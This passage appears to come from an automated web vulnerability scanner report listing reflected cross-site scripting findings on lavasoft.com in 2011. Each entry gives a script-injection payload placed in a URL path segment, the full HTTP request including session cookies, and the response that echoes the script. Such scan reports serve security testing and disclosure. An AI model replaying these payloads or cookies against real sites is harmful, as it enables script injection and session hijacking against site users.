Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18307
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/user183e2'><script>alert(1)</script>bc10062b1a0/user.js'>
...[SNIP]...

1.217. http://www.lavasoft.com/mylavasoft/modules/user/user.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b616b'><script>alert(1)</script>b774bbd66e1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/user/user.jsb616b'><script>alert(1)</script>b774bbd66e1?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18307
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/user/user.jsb616b'><script>alert(1)</script>b774bbd66e1'>
...[SNIP]...

1.218. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 58282'><script>alert(1)</script>e844c762b7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft58282'><script>alert(1)</script>e844c762b7a/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:27 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:27 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10659
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft58282'><script>alert(1)</script>e844c762b7a/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css?w'>
...[SNIP]...

1.219. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ad24f'><script>alert(1)</script>80b0e78178b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sitesad24f'><script>alert(1)</script>80b0e78178b/all/modules/cck/modules/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18292
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sitesad24f'><script>alert(1)</script>80b0e78178b/all/modules/cck/modules/fieldgroup/fieldgroup.css'>
...[SNIP]...

1.220. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cf7a'><script>alert(1)</script>4971be75db1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all4cf7a'><script>alert(1)</script>4971be75db1/modules/cck/modules/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all4cf7a'><script>alert(1)</script>4971be75db1/modules/cck/modules/fieldgroup/fieldgroup.css'>
...[SNIP]...

1.221. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3b91e'><script>alert(1)</script>09a0fb82f54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules3b91e'><script>alert(1)</script>09a0fb82f54/cck/modules/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules3b91e'><script>alert(1)</script>09a0fb82f54/cck/modules/fieldgroup/fieldgroup.css'>
...[SNIP]...

1.222. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 80300'><script>alert(1)</script>a8fa8110624 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck80300'><script>alert(1)</script>a8fa8110624/modules/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck80300'><script>alert(1)</script>a8fa8110624/modules/fieldgroup/fieldgroup.css'>
...[SNIP]...

1.223. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1ff16'><script>alert(1)</script>776fd51402b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules1ff16'><script>alert(1)</script>776fd51402b/fieldgroup/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules1ff16'><script>alert(1)</script>776fd51402b/fieldgroup/fieldgroup.css'>
...[SNIP]...

1.224. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e25ea'><script>alert(1)</script>76e833ea6be was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules/fieldgroupe25ea'><script>alert(1)</script>76e833ea6be/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules/fieldgroupe25ea'><script>alert(1)</script>76e833ea6be/fieldgroup.css'>
...[SNIP]...

1.225. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6526f'><script>alert(1)</script>a83c4abad5c was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css6526f'><script>alert(1)</script>a83c4abad5c?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css6526f'><script>alert(1)</script>a83c4abad5c'>
...[SNIP]...

1.226. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5a0d'><script>alert(1)</script>9c48b8d5610 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoftc5a0d'><script>alert(1)</script>9c48b8d5610/sites/all/modules/cck/modules/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:26 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:26 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10657
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoftc5a0d'><script>alert(1)</script>9c48b8d5610/sites/all/modules/cck/modules/filefield/filefield.css?w'>
...[SNIP]...

1.227. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4f27'><script>alert(1)</script>30edce3703c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sitesf4f27'><script>alert(1)</script>30edce3703c/all/modules/cck/modules/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18288
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
